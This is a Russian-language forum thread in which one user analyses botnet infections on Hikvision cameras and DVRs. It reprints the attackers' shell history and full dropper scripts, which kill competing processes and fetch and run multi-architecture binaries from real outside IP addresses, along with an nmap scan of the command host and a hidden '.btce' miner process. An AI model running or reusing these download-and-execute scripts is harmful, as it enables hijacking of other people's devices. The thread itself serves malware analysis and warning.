IP устройства как элементы Bot-Net

Раздел содержит статьи по различным тематикам: безопасность и пр.

iTuneDVR
Сообщения: 3218
Зарегистрирован: 24 авг 2013, 11:05

Re: IP устройства как элементы Bot-Net

Сообщение iTuneDVR » 24 июл 2015, 13:36

Вчера опять опять столкнулся с подобной ситуацией!

Мне был предоставлен удалённый доступ к только что купленной камере Hikvision. Я конечно предупредил владельца о смене стандартного пароля на другой, на всякий случай, чем он пренебрёг и вот тут как раз случился тот самый случай ;)
Всё сложилось удачно, однако могло пойти всё не так.

Итак по порядку.
Изучая очередной релиз информации из флеш-памяти камеры, полученной удалённо. Я обнаружил следующее!!!
В каталоге root я с удивлением увидел файл .ash_history, а в нём

Код: Выделить всё

sh
cd /tmp && wget http://185.11.146.114/hac.sh;sh hac.sh && rm hac.sh;tftp -r tftp.sh -g 185.11.146.114 && chmod +x tftp.sh && sh tftp.sh
/bin/busybox;echo -e '\147\141\171\146\147\164'

Напомню, что камера приехала только из чиная и нигде, как я думаю, не подключалась более, кроме как в момент моего подключения.

Пробил по этому IP, оказалось что это где-то в Улан-Уде Россия, хотя не факт, смотри ниже трассировку в nmap!!!

Я вручную скачал файл

Код: Выделить всё

 wget http://185.11.146.114/hac.sh

, а там новый скрипт

Код: Выделить всё

#!/bin/sh
killall sm
killall smi
killall sa
killall sp
killall ssh
killall sa4
killall s586
killall s68
killall spa
killall s86
killall mips
killall mipsel
killall ppc
killall x86_64
killall i686
killall i586
killall arm
killall superh
killall sparch
killall /sbin/telnetd
killall hicore
killall client
killall powerpc
pkill -9 /sbin/telnetd
pkill -9 mips
pkill -9 mipsel
pkill -9 ppc
pkill -9 client
pkill -9 hicore
pkill -9 x86_64
pkill -9 i686
pkill -9 i586
pkill -9 arm
pkill -9 superh
pkill -9 sparch
pkill -9 powerpc
pkill -9 sm
pkill -9 smi
pkill -9 sa
pkill -9 sp
pkill -9 ssh
pkill -9 sa4
pkill -9 s586
pkill -9 s68
pkill -9 spa
pkill -9 s86
busybox wget http://185.11.146.114/armn; cp /bin/busybox ./; cat armn > busybox; rm armn; cp busybox armn; rm busybox; ./armn
busybox wget http://185.11.146.114/mipsn; cp /bin/busybox ./; cat mipsn > busybox; rm mipsn; cp busybox mipsn; rm busybox; ./mipsn
busybox wget http://185.11.146.114/mipseln; cp /bin/busybox ./; cat mipseln > busybox; rm mipseln; cp busybox mipseln; rm busybox; ./mipseln
busybox wget http://185.11.146.114/ppcn; cp /bin/busybox ./; cat ppcn > busybox; rm ppcn; cp busybox ppcn; rm busybox; ./ppcn
busybox wget http://185.11.146.114/superhn; cp /bin/busybox ./; cat superhn > busybox; rm superhn; cp busybox superhn; rm busybox; ./superhn
busybox wget http://185.11.146.114/i686n; cp /bin/busybox ./; cat i686n > busybox; rm i686n; cp busybox i686n; rm busybox; ./i686n
busybox wget http://185.11.146.114/s586n; cp /bin/busybox ./; cat s586n > busybox; rm s586n; cp busybox s586n; rm busybox; ./s586n
busybox wget http://185.11.146.114/s86n; cp /bin/busybox ./; cat s86n > busybox; rm s86n; cp busybox s86n; rm busybox; ./s86n
busybox wget http://185.11.146.114/sa4n; cp /bin/busybox ./; cat sa4n > busybox; rm sa4n; cp busybox sa4n; rm busybox; ./sa4n
busybox wget http://185.11.146.114/span; cp /bin/busybox ./; cat span > busybox; rm span; cp busybox span; rm busybox; ./span
rm -f *


Пошёл дальше и решил скачать, как и в прошлый раз, исполняемые файлы из скрипта, скомпилированные под разные платформы.
Мой AVAST стал сразу ругаться, поэтому пришлось его отключить ненадолго.

Не удалось скачать файл по команде

Код: Выделить всё

tftp -r tftp.sh -g 185.11.146.114

такого файла на оказалось.

Как я и писал ранее, что нечто подобное я уже видел, о чём и писал здесь-же. Прошло время, а эти штуки работают!!!
Исходник один, но скомпилирован под разные платформы и интеерсное место выглядит примерно так в файле i686n

Изображение


Решил проверить что же там за узел такой, глубоко не копая пока.

Код: Выделить всё

# nmap  185.11.146.114 -O -A -vv

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-24 01:09 MSK
NSE: Loaded 118 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
NSE: Starting runlevel 2 (of 2) scan.
Initiating Ping Scan at 01:09
Scanning 185.11.146.114 [4 ports]
Completed Ping Scan at 01:09, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:09
Completed Parallel DNS resolution of 1 host. at 01:09, 0.07s elapsed
Initiating SYN Stealth Scan at 01:09
Scanning hosted-by.blazingfast.io (185.11.146.114) [1000 ports]
Discovered open port 53/tcp on 185.11.146.114
Discovered open port 22/tcp on 185.11.146.114
Discovered open port 80/tcp on 185.11.146.114
Discovered open port 3333/tcp on 185.11.146.114
Completed SYN Stealth Scan at 01:09, 2.27s elapsed (1000 total ports)
Initiating Service scan at 01:09
Scanning 4 services on hosted-by.blazingfast.io (185.11.146.114)
Completed Service scan at 01:11, 122.63s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against hosted-by.blazingfast.io (185.11.146.114)
Retrying OS detection (try #2) against hosted-by.blazingfast.io (185.11.146.114)
Initiating Traceroute at 01:11
Completed Traceroute at 01:11, 3.02s elapsed
Initiating Parallel DNS resolution of 11 hosts. at 01:11
Completed Parallel DNS resolution of 11 hosts. at 01:11, 0.28s elapsed
NSE: Script scanning 185.11.146.114.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:11
Completed NSE at 01:12, 30.26s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Nmap scan report for hosted-by.blazingfast.io (185.11.146.114)
Host is up (0.060s latency).
Scanned at 2015-07-24 01:09:32 MSK for 164s
Not shown: 993 closed ports
PORT      STATE    SERVICE    VERSION
22/tcp    open     ssh        OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
| ssh-hostkey:
|   1024 d8:02:0d:e8:ff:ce:73:3f:da:43:6f:63:f9:fe:64:29 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAMJtJO4/csR0po1i+JipRVuixtJiT5+89eCg7Zy+ybgNIwmSnKpSjtQnnOB/PpTY0neacB0mPvggJzqAC2OPaMlJigTHsBKEvoX7KXXPJTslcah8XHIuno1vOkyz4UVdBXYymjg0tUAFk7NNuuoH5rcuyNXNkLjSTkVUkHZqvYDlAAAAFQCv7NjoTIiLGHTG9KiVKnMeHmyjsQAAAIBnkw8NJpclzbuxhN0/DJ5K/oZCck+Cz8ZhQvOurEVuBkKASJkApSk0Pi73aUYd88dYgYZI9o2Thr8YkLLMiQvpeov/BB2GjEpZ0U9ykWEeqbGQ8fYOT6hF8lU/QFIFdxolFe+PWHTlykJLEpw8Ey1yBkZ4oo4E4l7H5ZRO2zG9fwAAAIEAn4ElCzMwfrLpnNd6lEH9Fd4WXm9C1jkRA9+YT7qhOluHNqaFXYaFi4tljfwjAEpIq1Ky5GyNBQu7NONCz9n5fHi1/Le8d4WVLyA27g823gcfjcnCaBWYx4XM/Gf6WoeZ0XT50P+RapUWKxxIUOaNWWjNDUY1S/tX7TMkoG5Oa+M=
|   2048 74:0f:b9:7f:6f:47:38:0c:f0:e5:dd:f4:9a:7c:2a:65 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDC4SAVjz6G+BE1uT4HcScNq/dWHhNIlNk78cgR7vRHMI3vjnBbSI4R1wLFHNML4rAJxZ7MmICA5IvQWjII9pKWEvfk7hO1P+EdNO4Dqa5qsKwTBPt49TrPTfiuh8ZS9saXYMSg8SXc/85G31qPgisS08WetbL2RHTrazm98iydqmynKfopm0Z5Io+l4BYK4EKgD5lQXYGuy+AGqzymCoeTCMkVnaPQKtGOx3Be4eDTNAP/MTvsAnQrKnt3dyl8zxtiQ+NOHIKESghRkc+Bsfox+AcqUshk2iyjhh8V2suAzPumzaLZGbEKK8cgzEXYK94pfSu8H60+JBzAgPV1/U5x
|   256 12:8d:c7:38:e7:65:9f:fc:68:17:fb:67:63:49:d5:cd (ECDSA)
|_ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJMWxXVAIjSxUB41vHl9jzd+23W8rm1iWRFtznaYcZWEv0HaLqEI+CfCfG4KeHcF2pWz0Bui6DgIV5vPLQDSbjI=
53/tcp    open     domain?
|_dns-nsid: ERROR: Script execution failed (use -d to debug)
80/tcp    open     http       Apache httpd 2.2.22 ((Debian))
|_http-methods: OPTIONS GET HEAD POST
|_http-title: Site doesn't have a title (text/html).
1234/tcp  filtered hotline
1524/tcp  filtered ingreslock
3333/tcp  open     dec-notes?
65000/tcp filtered unknown
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=6.47%I=7%D=7/24%Time=55B16624%P=i686-pc-linux-gnu%r(NULL,E
SF:,"!\*\x20SCANNER\x20ON\n")%r(DNSVersionBindReq,E,"!\*\x20SCANNER\x20ON\
SF:n")%r(DNSStatusRequest,E,"!\*\x20SCANNER\x20ON\n")%r(GenericLines,E,"!\
SF:*\x20SCANNER\x20ON\n")%r(GetRequest,13,"!\*\x20SCANNER\x20ON\nPING\n")%
SF:r(HTTPOptions,E,"!\*\x20SCANNER\x20ON\n")%r(RTSPRequest,E,"!\*\x20SCANN
SF:ER\x20ON\n")%r(RPCCheck,E,"!\*\x20SCANNER\x20ON\n")%r(Help,E,"!\*\x20SC
SF:ANNER\x20ON\n")%r(SMBProgNeg,E,"!\*\x20SCANNER\x20ON\n")%r(X11Probe,E,"
SF:!\*\x20SCANNER\x20ON\n")%r(FourOhFourRequest,E,"!\*\x20SCANNER\x20ON\n"
SF:)%r(LPDString,E,"!\*\x20SCANNER\x20ON\n")%r(LDAPBindReq,13,"!\*\x20SCAN
SF:NER\x20ON\nBOTS\n")%r(SIPOptions,E,"!\*\x20SCANNER\x20ON\n")%r(LANDesk-
SF:RC,E,"!\*\x20SCANNER\x20ON\n")%r(TerminalServer,E,"!\*\x20SCANNER\x20ON
SF:\n")%r(NCP,13,"!\*\x20SCANNER\x20ON\nPING\n")%r(NotesRPC,E,"!\*\x20SCAN
SF:NER\x20ON\n")%r(WMSRequest,E,"!\*\x20SCANNER\x20ON\n")%r(oracle-tns,13,
SF:"!\*\x20SCANNER\x20ON\nBOTS\n")%r(afp,13,"!\*\x20SCANNER\x20ON\nBOTS\n"
SF:)%r(kumo-server,E,"!\*\x20SCANNER\x20ON\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port3333-TCP:V=6.47%I=7%D=7/24%Time=55B16624%P=i686-pc-linux-gnu%r(NULL
SF:,A,"Password:\x20")%r(LPDString,A,"Password:\x20")%r(RPCCheck,A,"Passwo
SF:rd:\x20")%r(DNSVersionBindReq,A,"Password:\x20")%r(DNSStatusRequest,A,"
SF:Password:\x20")%r(Help,A,"Password:\x20")%r(SMBProgNeg,A,"Password:\x20
SF:")%r(X11Probe,A,"Password:\x20")%r(LDAPBindReq,A,"Password:\x20")%r(LAN
SF:Desk-RC,A,"Password:\x20")%r(TerminalServer,A,"Password:\x20")%r(NCP,A,
SF:"Password:\x20")%r(NotesRPC,A,"Password:\x20")%r(WMSRequest,A,"Password
SF::\x20")%r(oracle-tns,A,"Password:\x20")%r(afp,A,"Password:\x20")%r(kumo
SF:-server,A,"Password:\x20");
Device type: general purpose|broadband router|WAP|media device|storage-misc
Running (JUST GUESSING): Linux 2.6.X|3.X (98%), Asus Linux (92%), Infomir Linux 2.6.X (91%), HP embedded (91%), LG Linux 2.6.X (90%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:asus:linux_kernel cpe:/o:infomir:linux_kernel:2.6 cpe:/h:hp:p2000_g3 cpe:/o:linux:linux_kernel:2.6.22 cpe:/o:lg:linux_kernel:2.6
OS fingerprint not ideal because: Host distance (12 network hops) is greater than five
Aggressive OS guesses: Linux 2.6.32 - 3.10 (98%), Linux 3.2 - 3.10 (97%), Linux 3.10 (95%), Linux 3.11 (95%), Linux 3.2 - 3.8 (95%), Linux 3.2 (93%), Linux 2.6.23 - 2.6.38 (93%), Linux 2.6.32 - 3.1 (92%), OpenWrt 12.09-rc1 Attitude Adjustment (Linux 3.3 - 3.7) (92%), Linux 2.6.32 - 2.6.39 (92%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=6.47%E=4%D=7/24%OT=22%CT=1%CU=41291%PV=N%DS=12%DC=T%G=N%TM=55B166C0%P=i686-pc-linux-gnu)
SEQ(SP=FD%GCD=1%ISR=109%TI=Z%CI=I%TS=8)
OPS(O1=M5B4ST11NW4%O2=M5B4ST11NW4%O3=M5B4NNT11NW4%O4=M5B4ST11NW4%O5=M5B4ST11NW4%O6=M5B4ST11)
WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3890)
ECN(R=Y%DF=Y%T=42%W=3908%O=M5B4NNSNW4%CC=Y%Q=)
T1(R=Y%DF=Y%T=42%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=42%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=42%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=42%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=N)
U1(R=Y%DF=N%T=42%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=N)

Uptime guess: 4.100 days (since Sun Jul 19 22:48:36 2015)
Network Distance: 12 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   0.60 ms  192.168.0.1
2  ....
6   55.52 ms mx01.Frankfurt.gldn.net (79.104.235.66)
7   53.01 ms fra-anc-02gw.voxility.net (80.81.195.144)
8   53.16 ms fra-eq5-01gw.voxility.net (93.115.89.5)
9   55.79 ms fra-anc-01c.voxility.net (109.163.237.26)
10  60.07 ms fra-anc-02sw.voxility.net (5.254.104.30)
11  ...
12  62.48 ms hosted-by.blazingfast.io (185.11.146.114)

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 01:12
Completed NSE at 01:12, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.51 seconds
           Raw packets sent: 1086 (50.100KB) | Rcvd: 1042 (43.136KB)
#


По сути ясно что это такое, а вот кто этим должен заниматься, вот вопрос???

iTuneDVR
Сообщения: 3218
Зарегистрирован: 24 авг 2013, 11:05

Re: IP устройства как элементы Bot-Net

Сообщение iTuneDVR » 24 июл 2015, 23:43

Наконец таки попал ко мне в руки, а точнее я его выудил из удалённого регистратора Hikvision DS-7616NI-SE, файл который грузит хиковские регистраторы и якобы считает биткоинты. ;)

Подтверждаю, что не один такой процесс запущен на регистраторе, а также огромное количество запросов открыто с регистратора наружу во внешний мир.
Собственно мотивы очень схожие, в особенности в команде echo -e '\147\141\171\146\147\164'

Это что-то вроде подписи у них! ;)

Думаю невооружённым глазом видно, как мне кажется, что писаное сие одними руками!!!

Изображение

Местонахождение исполняемого файла. С точкой чтобы так сразу не увидеть!!!
# ls / -la
drwxrwxrwx 17 root root 608 Jul 19 15:02 .
drwxrwxrwx 17 root root 608 Jul 19 15:02 ..
-rwxrwxrwx 1 root root 55864 Jul 22 10:58 .btce
-rw-r--r-- 1 root root 2 Jul 24 18:37 .sysstat.out
drwxr-xr-x 2 root root 1984 Jun 9 06:39 bin
drwxr-xr-x 2 root root 64 Jun 9 06:39 dav
drwxrwxrwt 6 root root 1540 Jul 23 19:48 dev
drwxr-xr-x 4 root root 640 Jul 19 13:57 etc
drwxr-xr-x 4 root root 160 Jul 19 13:57 home
drwxr-xr-x 2 root root 352 Jun 9 06:39 lib
drwxr-xr-x 2 root root 64 Jun 9 06:39 mnt
drwxr-xr-x 3 root root 96 Jul 19 13:57 opt
dr-xr-xr-x 295 root root 0 Jan 1 00:00 proc
drwxr-xr-x 2 root root 64 Jun 9 06:39 root
drwxr-xr-x 2 root root 288 Jun 9 06:39 sbin
drwxr-xr-x 2 root root 64 Jun 9 06:39 srv
drwxr-xr-x 11 root root 0 Jul 19 13:57 sys
drwxr-xr-x 3 root root 96 Jul 24 18:39 tmp
drwxr-xr-x 4 root root 160 Jul 19 13:57 var

А вот так выглядят процессы!!! hicore - это основное приложение и конечно же оно не столько раз запущено, а триды процессов порождены основным.
16-ти канальный регистратор и так нагружен своими задачами, а тут еще и множество посторонних процессов под именем //.btce //
Конечно бедняга там загибался от нагрузки, но благо видимо не перезагружался!!!

#ps
PID Uid mSize Stat Command
1 root 276 S init
2 root SW [kthreadd]
3 root SW [ksoftirqd/0]
4 root SW [kworker/0:0]
6 root SW< [khelper]
7 root SW< [mboxd]
8 root SW [sync_supers]
9 root SW [bdi-default]
10 root SW< [kblockd]
11 root SW< [omap2_mcspi]
12 root SW [khubd]
13 root SW [kseriod]
14 root SW< [kmmcd]
15 root SW< [musb-hdrc.0]
16 root SW< [musb-hdrc.1]
17 root SW< [rpciod]
19 root SW [kswapd0]
20 root SW [fsnotify_mark]
21 root SW< [aio]
22 root SW< [nfsiod]
28 root SW< [iscsi_eh]
29 root SW [scsi_eh_0]
30 root SW [scsi_eh_1]
33 root SW [mtdblock0]
34 root SW [mtdblock1]
37 root SW< [usbhid_resumer]
38 root SW< [ale_check]
54 root 248 S < /sbin/udevd -d
63 root SWN [jffs2_gcd_mtd1]
99 root 29668 S ./hicore
100 root 320 S /bin/inetd
101 root 344 S -sh
102 guest 308 S sh
103 root 1044 S < ./iscsi/iscsid
105 root 29668 S ./hicore
106 root 29668 S ./hicore
107 root SW [kworker/0:2]
108 root 29668 S ./hicore
109 root 29668 D ./hicore
110 root 29668 D ./hicore
111 root 29668 D ./hicore
112 root 29668 S ./hicore
113 root 29668 S ./hicore
114 root 29668 S ./hicore
115 root 29668 S ./hicore
116 root 29668 S ./hicore
117 root 29668 S ./hicore
118 root 29668 S ./hicore
119 root 29668 S ./hicore
120 root 29668 S ./hicore
121 root 29668 S ./hicore
122 root 29668 S ./hicore
123 root 29668 S ./hicore
124 root 29668 S ./hicore
125 root 29668 S ./hicore
126 root 29668 S ./hicore
127 root 29668 S ./hicore
128 root 29668 S ./hicore
129 root 29668 S ./hicore
130 root 29668 S ./hicore
131 root 29668 S ./hicore
132 root 29668 S ./hicore
133 root 29668 S ./hicore
134 root 29668 S ./hicore
135 root 29668 S ./hicore
136 root 29668 S ./hicore
137 root 29668 S ./hicore
138 root 29668 S ./hicore
139 root 29668 S ./hicore
140 root 29668 S ./hicore
141 root 29668 S ./hicore
142 root 29668 S ./hicore
143 root 29668 S ./hicore
144 root 29668 S ./hicore
145 root 29668 S ./hicore
146 root 29668 S ./hicore
147 root 29668 S ./hicore
148 root 29668 S ./hicore
149 root 29668 S ./hicore
150 root 29668 S ./hicore
151 root 29668 S ./hicore
152 root 29668 S ./hicore
153 root 29668 S ./hicore
154 root 29668 S ./hicore
155 root 29668 S ./hicore
156 root 29668 S ./hicore
157 root 29668 S ./hicore
158 root 29668 S ./hicore
159 root 29668 S ./hicore
160 root 29668 S ./hicore
161 root 29668 S ./hicore
162 root 29668 S ./hicore
163 root 29668 S ./hicore
164 root 29668 S ./hicore
165 root 29668 S ./hicore
166 root 29668 S ./hicore
167 root 29668 S ./hicore
168 root 29668 S ./hicore
169 root 29668 S ./hicore
170 root 29668 S ./hicore
171 root 29668 S ./hicore
172 root 29668 S ./hicore
173 root 29668 S ./hicore
174 root 29668 S ./hicore
175 root 29668 S ./hicore
176 root 29668 S ./hicore
177 root 29668 S ./hicore
178 root 29668 S ./hicore
179 root 29668 S ./hicore
180 root 29668 S ./hicore
181 root 29668 S ./hicore
182 root 29668 S ./hicore
183 root 29668 S ./hicore
184 root 29668 S ./hicore
185 root 29668 S ./hicore
186 root 29668 S ./hicore
187 root 29668 S ./hicore
188 root 29668 S ./hicore
189 root 29668 S ./hicore
190 root 29668 S ./hicore
191 root 29668 S ./hicore
192 root 29668 S ./hicore
193 root 29668 S ./hicore
194 root 29668 S ./hicore
195 root 29668 S ./hicore
196 root 29668 S ./hicore
197 root 29668 S ./hicore
198 root 29668 S ./hicore
199 root 29668 S ./hicore
200 root 29668 S ./hicore
201 root 29668 S ./hicore
202 root 29668 S ./hicore
203 root 29668 S ./hicore
204 root 29668 S ./hicore
205 root 29668 S ./hicore
206 root 29668 S ./hicore
207 root 29668 S ./hicore
208 root 29668 S ./hicore
209 root 29668 S ./hicore
210 root 29668 S ./hicore
211 root 29668 S ./hicore
212 root 29668 S ./hicore
213 root 29668 S ./hicore
214 root 29668 S ./hicore
215 root 29668 S ./hicore
216 root 29668 S ./hicore
217 root 29668 S ./hicore
219 root 29668 S ./hicore
220 root 29668 S ./hicore
221 root 29668 S ./hicore
232 root 29668 S ./hicore
234 root 29668 S ./hicore
235 root 29668 S ./hicore
236 root 29668 S ./hicore
237 root 29668 S ./hicore
244 root 29668 S ./hicore
245 root 29668 S ./hicore
246 root 29668 S ./hicore
247 root 29668 S ./hicore
248 root 29668 S ./hicore
249 root 29668 S ./hicore
250 root 29668 S ./hicore
251 root 29668 S ./hicore
252 root 29668 S ./hicore
253 root 29668 S ./hicore
254 root 29668 S ./hicore
255 root 29668 S ./hicore
268 root 29668 S ./hicore
269 root 29668 S ./hicore
270 root 29668 S ./hicore
272 root 29668 S ./hicore
273 root 29668 S ./hicore
274 root 29668 S ./hicore
275 root 29668 S ./hicore
276 root 29668 S ./hicore
277 root 29668 S ./hicore
278 root 29668 S ./hicore
279 root 29668 S ./hicore
280 root 29668 S ./hicore
281 root 29668 S ./hicore
282 root 29668 S ./hicore
283 root 29668 S ./hicore
284 root 29668 S ./hicore
285 root 29668 S ./hicore
286 root 29668 S ./hicore
287 root 29668 S ./hicore
288 root 29668 S ./hicore
289 root 29668 S ./hicore
293 root 29668 S ./hicore
294 root 29668 S ./hicore
295 root 29668 S ./hicore
296 root 29668 S ./hicore
297 root 29668 S ./hicore
298 root 29668 S ./hicore
299 root 29668 S ./hicore
300 root 29668 S ./hicore
302 root 92 S //.btce //
305 root 92 S //.btce //

317 root 29668 S ./hicore
318 root 29668 S ./hicore
320 root 29668 S ./hicore
329 root 29668 S ./hicore
342 root 29668 S ./hicore
346 root 29668 S ./hicore
347 root 92 S //.btce //
348 root 29668 S ./hicore
351 root 92 S //.btce //
353 root 29668 S ./hicore
386 root 29668 S ./hicore
387 root 29668 S ./hicore
388 root 29668 S ./hicore
391 root 29668 S ./hicore
392 root 29668 S ./hicore
393 root 29668 S ./hicore
404 root 29668 S ./hicore
405 root 29668 S ./hicore
676 root 29668 S ./hicore
685 root 29668 S ./hicore
694 root 29668 S ./hicore
695 root 29668 S ./hicore
702 root 29668 S ./hicore
703 root 29668 S ./hicore
720 root 29668 S ./hicore
725 root 29668 S ./hicore
732 root 29668 S ./hicore
733 root 29668 S ./hicore
734 root 29668 S ./hicore
735 root 29668 S ./hicore
736 root 29668 S ./hicore
737 root 29668 S ./hicore
738 root 29668 S ./hicore
739 root 29668 S ./hicore
740 root 29668 S ./hicore
741 root 29668 S ./hicore
753 root 29668 S ./hicore
754 root 29668 S ./hicore
755 root 29668 S ./hicore
758 root 29668 S ./hicore
1059 root 92 S //.btce //
1066 root 92 S //.btce //
1347 root 92 S //.btce //
1354 root 92 S //.btce //
1586 root 92 S //.btce //
1589 root 92 S //.btce //

1670 root 29668 S ./hicore
1671 root 29668 S ./hicore
2195 root SW [kworker/u:1]
2779 root 248 S /bin/telnetd
2780 root 276 S /bin/login
2801 root 248 S /bin/telnetd
2802 root 368 S -sh
2859 root 296 R ps
15857 root 616 S //.btce //
16538 root SW [flush-1:0]
23239 root 29668 S ./hicore
24792 root 244 S /bin/telnetd
24793 root 360 S -sh
24927 root 332 S sh
28791 root SW [flush-8:0]
29888 root 64 S
30717 root 52 S
30905 root SW [kworker/u:2]
32020 root 29668 S ./hicore
32025 root 29668 S ./hicore
32030 root 29668 S ./hicore
32031 root 29668 S ./hicore
32032 root 29668 S ./hicore
32033 root 29668 S ./hicore
32034 root 29668 S ./hicore
32037 root 29668 S ./hicore
32038 root 29668 S ./hicore
32039 root 29668 S ./hicore
32040 root 29668 S ./hicore
32041 root 29668 S ./hicore
32042 root 29668 S ./hicore
32043 root 29668 S ./hicore
32044 root 29668 S ./hicore
32045 root 29668 S ./hicore
32304 root 52 S
32408 root 92 S //.btce //
32597 root SW [kworker/u:0]

iTuneDVR
Сообщения: 3218
Зарегистрирован: 24 авг 2013, 11:05

Re: IP устройства как элементы Bot-Net

Сообщение iTuneDVR » 30 июл 2015, 19:46

На сегодняшний день запрос к адресу 185.11.146.114 из темы posting.php?mode=reply&f=35&t=414#pr1559
даёт файл hac.sh
в котором обновился адрес скачивания вредоносного кода 89.248.174.55
По геолокации теперь это Нидерланды, однако исходный адрес всё еще работает и отдаёт скрипт!!!


Код: Выделить всё

#!/bin/sh
killall mipseh
killall sm
killall smi
killall sa
killall sp
killall ssh
killall sa4
killall s586
killall s68
killall spa
killall s86
killall mips
killall mipsel
killall ppc
killall x86_64
killall i686
killall i586
killall arm
killall superh
killall sparch
killall /sbin/telnetd
killall hicore
killall client
killall powerpc
pkill -9 /sbin/telnetd
pkill -9 mips
pkill -9 mipsel
pkill -9 ppc
pkill -9 client
pkill -9 hicore
pkill -9 x86_64
pkill -9 i686
pkill -9 i586
pkill -9 arm
pkill -9 superh
pkill -9 sparch
pkill -9 powerpc
pkill -9 sm
pkill -9 smi
pkill -9 sa
pkill -9 sp
pkill -9 ssh
pkill -9 sa4
pkill -9 s586
pkill -9 s68
pkill -9 spa
pkill -9 s86
pkill -9 mipseh
busybox wget http://89.248.174.55/ppc440x; cp /bin/busybox ./; cat ppc440x > busybox; rm ppc440x; cp busybox ppc440x; rm busybox; ./ppc440x
busybox wget http://89.248.174.55/ppcx; cp /bin/busybox ./; cat ppcx > busybox; rm ppcx; cp busybox ppcx; rm busybox; ./ppcx
busybox wget http://89.248.174.55/sh4x; cp /bin/busybox ./; cat sh4x > busybox; rm sh4x; cp busybox sh4x; rm busybox; ./sh4x
busybox wget http://89.248.174.55/arm4x; cp /bin/busybox ./; cat arm4x > busybox; rm arm4x; cp busybox arm4x; rm busybox; ./arm4x
busybox wget http://89.248.174.55/arm5x; cp /bin/busybox ./; cat arm5x > busybox; rm arm5x; cp busybox arm5x; rm busybox; ./arm5x
busybox wget http://89.248.174.55/arm6x; cp /bin/busybox ./; cat arm6x > busybox; rm arm6x; cp busybox arm6x; rm busybox; ./arm6x
busybox wget http://89.248.174.55/mipsx; cp /bin/busybox ./; cat mipsx > busybox; rm mipsx; cp busybox mipsx; rm busybox; ./mipsx
busybox wget http://89.248.174.55/mipselx; cp /bin/busybox ./; cat mipselx > busybox; rm mipselx; cp busybox mipselx; rm busybox; ./mipselx
busybox wget http://89.248.174.55/sparcx; cp /bin/busybox ./; cat sparcx > busybox; rm sparcx; cp busybox sparcx; rm busybox; ./sparcx
busybox wget http://89.248.174.55/i586x; cp /bin/busybox ./; cat i586x > busybox; rm i586x; cp busybox i586x; rm busybox; ./i586x
busybox wget http://89.248.174.55/i686x; cp /bin/busybox ./; cat i686x > busybox; rm i686x; cp busybox i686x; rm busybox; ./i686x
busybox wget http://89.248.174.55/x86_64x; cp /bin/busybox ./; cat x86_64x > busybox; rm x86_64x; cp busybox x86_64x; rm busybox; ./x86_64x
busybox wget http://89.248.174.55/m68kx; cp /bin/busybox ./; cat m68kx > busybox; rm m68kx; cp busybox m68kx; rm busybox; ./m68kx
rm -f *



Если внимательно присмотреться, то в скрипте есть подвижки!!!
Исполняемый вредоносный код кросскомпилирован уже под большее количество платформ!!!

Код: Выделить всё

busybox wget http://89.248.174.55/ppc440x; cp /bin/busybox ./; cat ppc440x > busybox; rm ppc440x; cp busybox ppc440x; rm busybox; ./ppc440x
busybox wget http://89.248.174.55/ppcx; cp /bin/busybox ./; cat ppcx > busybox; rm ppcx; cp busybox ppcx; rm busybox; ./ppcx
busybox wget http://89.248.174.55/sh4x; cp /bin/busybox ./; cat sh4x > busybox; rm sh4x; cp busybox sh4x; rm busybox; ./sh4x
busybox wget http://89.248.174.55/arm4x; cp /bin/busybox ./; cat arm4x > busybox; rm arm4x; cp busybox arm4x; rm busybox; ./arm4x
busybox wget http://89.248.174.55/arm5x; cp /bin/busybox ./; cat arm5x > busybox; rm arm5x; cp busybox arm5x; rm busybox; ./arm5x
busybox wget http://89.248.174.55/arm6x; cp /bin/busybox ./; cat arm6x > busybox; rm arm6x; cp busybox arm6x; rm busybox; ./arm6x
busybox wget http://89.248.174.55/mipsx; cp /bin/busybox ./; cat mipsx > busybox; rm mipsx; cp busybox mipsx; rm busybox; ./mipsx
busybox wget http://89.248.174.55/mipselx; cp /bin/busybox ./; cat mipselx > busybox; rm mipselx; cp busybox mipselx; rm busybox; ./mipselx
busybox wget http://89.248.174.55/sparcx; cp /bin/busybox ./; cat sparcx > busybox; rm sparcx; cp busybox sparcx; rm busybox; ./sparcx
busybox wget http://89.248.174.55/i586x; cp /bin/busybox ./; cat i586x > busybox; rm i586x; cp busybox i586x; rm busybox; ./i586x
